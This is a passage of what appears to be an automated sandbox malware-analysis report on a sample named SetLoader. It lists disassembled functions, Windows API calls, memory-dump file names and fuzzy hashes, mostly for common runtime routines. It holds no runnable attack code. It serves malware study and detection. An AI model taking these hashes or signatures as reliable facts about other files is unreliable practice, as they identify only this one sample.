                                              • Opcode Fuzzy Hash: 30f0a27d7b968c5af1ec29b149fc898c06da3adb32fbf12fc271a10fbf152e2a
                                              • Instruction Fuzzy Hash: 8411C235500204FBDB215F21DC1A6ED37ABFB06361F19A529F81685390D770DEC49B52
                                              Function 0063D384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0063688D,00000000,00000000,?,0063D32B,0063688D,00000000,00000000,00000000,?,0063D528,00000006,FlsSetValue), ref: 0063D3B6
                                              • GetLastError.KERNEL32(?,0063D32B,0063688D,00000000,00000000,00000000,?,0063D528,00000006,FlsSetValue,0064AC00,FlsSetValue,00000000,00000364,?,0063BA77), ref: 0063D3C2
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0063D32B,0063688D,00000000,00000000,00000000,?,0063D528,00000006,FlsSetValue,0064AC00,FlsSetValue,00000000), ref: 0063D3D0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: bac07ca06c4be56d06e0fbb2655b65d5a628b2bdc994d060a341c38c9e0612e6
                                              • Instruction ID: a80c8fc702a835f4fd513fe4be1ec588350c7858fc585b1a9f456a829db91639
                                              • Opcode Fuzzy Hash: bac07ca06c4be56d06e0fbb2655b65d5a628b2bdc994d060a341c38c9e0612e6
                                              • Instruction Fuzzy Hash: C701FC36251226ABDB214B68FC44A97379EFF07B61B111620F916D7240C730DC0186E2
                                              Function 0063E077 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0063B9A5: GetLastError.KERNEL32(?,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063B9A9
                                                • Part of subcall function 0063B9A5: _free.LIBCMT ref: 0063B9DC
                                                • Part of subcall function 0063B9A5: SetLastError.KERNEL32(00000000,?), ref: 0063BA1D
                                                • Part of subcall function 0063B9A5: _abort.LIBCMT ref: 0063BA23
                                                • Part of subcall function 0063E19E: _abort.LIBCMT ref: 0063E1D0
                                                • Part of subcall function 0063E19E: _free.LIBCMT ref: 0063E204
                                                • Part of subcall function 0063DE0B: GetOEMCP.KERNEL32(00000000,?,?,0063E094,?), ref: 0063DE36
                                              • _free.LIBCMT ref: 0063E0EF
                                              • _free.LIBCMT ref: 0063E125
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$ErrorLast_abort
                                              • String ID: p,e
                                              • API String ID: 2991157371-2941865787
                                              • Opcode ID: 1858308ce9b68ad07099a16fecddc16c45caee8d51a0d8ce1bc7440b04c66dde
                                              • Instruction ID: f495019b81a9c3e0feaba9f291383d650d066e49450312db9efd57f00f2cacff
                                              • Opcode Fuzzy Hash: 1858308ce9b68ad07099a16fecddc16c45caee8d51a0d8ce1bc7440b04c66dde
                                              • Instruction Fuzzy Hash: E831AF31900608AFDB24EBA9D841A99B7F7EF81320F25509DE5049B2D1EBB29D51CBA4
                                              Function 0061B9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0061F306,00000001,?,?,?,00000000,00627564,?,?,?,?), ref: 0061B9DE
                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0061BA25
                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0061F306,00000001,?,?,?), ref: 0061BA51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileWrite$Handle
                                              • String ID:
                                              • API String ID: 4209713984-0
                                              • Opcode ID: 4517188cea6ef4a94b508cb59a112e04316931c85ab5abb0f6491be7a3ea92ad
                                              • Instruction ID: ff35b8928257361f023edf8935c908b6f1ff4ed2a479238149d9c820839c7304
                                              • Opcode Fuzzy Hash: 4517188cea6ef4a94b508cb59a112e04316931c85ab5abb0f6491be7a3ea92ad
                                              • Instruction Fuzzy Hash: A331BE71208305AFDB14CF24D858BEA77A6FF82715F081A1DF98197290CB749989CBA2
                                              Function 0061BEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0061E1EC: _wcslen.LIBCMT ref: 0061E1F2
                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0061BBD0,?,00000001,00000000,?,?), ref: 0061BF12
                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0061BBD0,?,00000001,00000000,?,?), ref: 0061BF45
                                              • GetLastError.KERNEL32(?,?,?,00000000,0061BBD0,?,00000001,00000000,?,?), ref: 0061BF62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                              • String ID:
                                              • API String ID: 2260680371-0
                                              • Opcode ID: 4c0014d2a4ae272313c8756e3bf6e8bd1b8172e138a6ea4f094106ba5994d9a2
                                              • Instruction ID: 523ea1ea5d2b9df5d2203ebecb8e85505ae642e29aaf5ee5932c7ba69bc6ad66
                                              • Opcode Fuzzy Hash: 4c0014d2a4ae272313c8756e3bf6e8bd1b8172e138a6ea4f094106ba5994d9a2
                                              • Instruction Fuzzy Hash: 7A11E175200214AEDB11AF718D05BEE77AA9F0A700F0C5458FA01DA291DB64DEC28AA9
                                              Function 0063DEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0063DF08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Info
                                              • String ID:
                                              • API String ID: 1807457897-3916222277
                                              • Opcode ID: bcf797ae17e4de297f5579216d4cbbd0e767593aa106cc7ecc5024fbfb498f81
                                              • Instruction ID: 108d183f945cbcd29a5ba42394c17c7a70449ddbc080ebc0b51827c6975df214
                                              • Opcode Fuzzy Hash: bcf797ae17e4de297f5579216d4cbbd0e767593aa106cc7ecc5024fbfb498f81
                                              • Instruction Fuzzy Hash: A141287050838C9BDF258E249C84BF6BBFBEF45304F1404EDE59A87142D276AA55CFA0
                                              Function 0063D5BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0063D62D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: String
                                              • String ID: LCMapStringEx
                                              • API String ID: 2568140703-3893581201
                                              • Opcode ID: 794f4be6848a681c4f534c6cee671e20fc66c2244ac80dc8678bd3ea0774b405
                                              • Instruction ID: 1754e23b1102fb0d4d55955bbfdf2e7af106ece0f129d280303ceb58e51c3e2a
                                              • Opcode Fuzzy Hash: 794f4be6848a681c4f534c6cee671e20fc66c2244ac80dc8678bd3ea0774b405
                                              • Instruction Fuzzy Hash: 26010832540219BBCF12AFA0ED02DEE7FA7EF4E750F054119FE1825160CA768A31EB85
                                              Function 0063D55A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0063CBBF), ref: 0063D5A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CountCriticalInitializeSectionSpin
                                              • String ID: InitializeCriticalSectionEx
                                              • API String ID: 2593887523-3084827643
                                              • Opcode ID: 608bff8acd0a4288e0ca984b79412fff3d2974b5e591a0bdf630389af606c3e2
                                              • Instruction ID: e3ae50f50702b07f14a199da19116e1f2b33f00c6174edb14ff81c4100cd6b26
                                              • Opcode Fuzzy Hash: 608bff8acd0a4288e0ca984b79412fff3d2974b5e591a0bdf630389af606c3e2
                                              • Instruction Fuzzy Hash: 52F0E93168121CBBCF05AFA4DD01DAE7F63DF1A721F014129FD045A260CA714E10D7D5
                                              Function 0063D3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Alloc
                                              • String ID: FlsAlloc
                                              • API String ID: 2773662609-671089009
                                              • Opcode ID: 9290c552197b259d3fb44587f4e4e61e65fbfb4c16ce15030922cdaec65788f8
                                              • Instruction ID: c370c4e59bdd9474c4684eacbfa217d3c449d04b24288c93660389d0358869dc
                                              • Opcode Fuzzy Hash: 9290c552197b259d3fb44587f4e4e61e65fbfb4c16ce15030922cdaec65788f8
                                              • Instruction Fuzzy Hash: 55E0E531681218B79704ABA4BC12D6EBBA7CB4A711F410169FC0557241CE715E0196CA
                                              Function 006310A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006310BA
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: 3To
                                              • API String ID: 1269201914-245939750
                                              • Opcode ID: c1a74fca7f420e3947901dd67ec95f625d86d8ef8419eed84c813339b5475a75
                                              • Instruction ID: 96c42a9c48060f32f06d8ec15f11c258a09ccd94ba1d7179fe3ae06e906a0604
                                              • Opcode Fuzzy Hash: c1a74fca7f420e3947901dd67ec95f625d86d8ef8419eed84c813339b5475a75
                                              • Instruction Fuzzy Hash: 71B012E139C100BC33193244AC12C36014FC4CAB10730CA3EF404C4080D9406CC910B2
                                              Function 00630A70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: b7e5382a695225ff055a28b83099c5739e4efdd9dc3ea6315af60db17dc9429c
                                              • Instruction ID: 5dad63c23893ff332ef278de41521132efc3e205398ee463efe444dcc9342a04
                                              • Opcode Fuzzy Hash: b7e5382a695225ff055a28b83099c5739e4efdd9dc3ea6315af60db17dc9429c
                                              • Instruction Fuzzy Hash: F1B012C539C100ED33455298AD32C37018FD4C4B10B30C47EF448C0041D4411C0B0171
                                              Function 00630A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 0cdb2a4fc7d05d344a4ce7eb5d7e9baff171b93852fe59170a57b276fe7f0f59
                                              • Instruction ID: eb3241a318e0535c1ca89037cf5c4dc94463687c619030e4d02b55ecd2f73bad
                                              • Opcode Fuzzy Hash: 0cdb2a4fc7d05d344a4ce7eb5d7e9baff171b93852fe59170a57b276fe7f0f59
                                              • Instruction Fuzzy Hash: 2FB012C53AC200FD33855298AC32C36018FD4C4B20B30C53EF048C0441D4401C4A0171
                                              Function 00630A6B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 1df2193e9da9027a5c083e4d8bf90c2d78280ad5ef1165cc95c14f759bd486cd
                                              • Instruction ID: d340abbe4b467d50703f0ca47313d643a9f44aa22f40f707267b745bfd9ff6e1
                                              • Opcode Fuzzy Hash: 1df2193e9da9027a5c083e4d8bf90c2d78280ad5ef1165cc95c14f759bd486cd
                                              • Instruction Fuzzy Hash: DCA002D5299101FD32455295AD36C36015ED4C5B55B31995DF445C44415441185A5075
                                              Function 00630A7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: c4741513cdd58072e750f4c015565098231bef1592d5d5d07baa7621ffe221da
                                              • Instruction ID: d340abbe4b467d50703f0ca47313d643a9f44aa22f40f707267b745bfd9ff6e1
                                              • Opcode Fuzzy Hash: c4741513cdd58072e750f4c015565098231bef1592d5d5d07baa7621ffe221da
                                              • Instruction Fuzzy Hash: DCA002D5299101FD32455295AD36C36015ED4C5B55B31995DF445C44415441185A5075
                                              Function 00630A50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 6a47064488d15d1bdeb4ad5294041373ef93d2c9ea18dfbadf994f32fb30c781
                                              • Instruction ID: 083d7917f3c4d63750183a5c90148ad96d7939fad858bc2bc345a9d7d98b41c2
                                              • Opcode Fuzzy Hash: 6a47064488d15d1bdeb4ad5294041373ef93d2c9ea18dfbadf994f32fb30c781
                                              • Instruction Fuzzy Hash: B8A012C5294100BC32055290AC36C36028ED4C0B10B30841DF040C00416440180A0070
                                              Function 00630A93 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
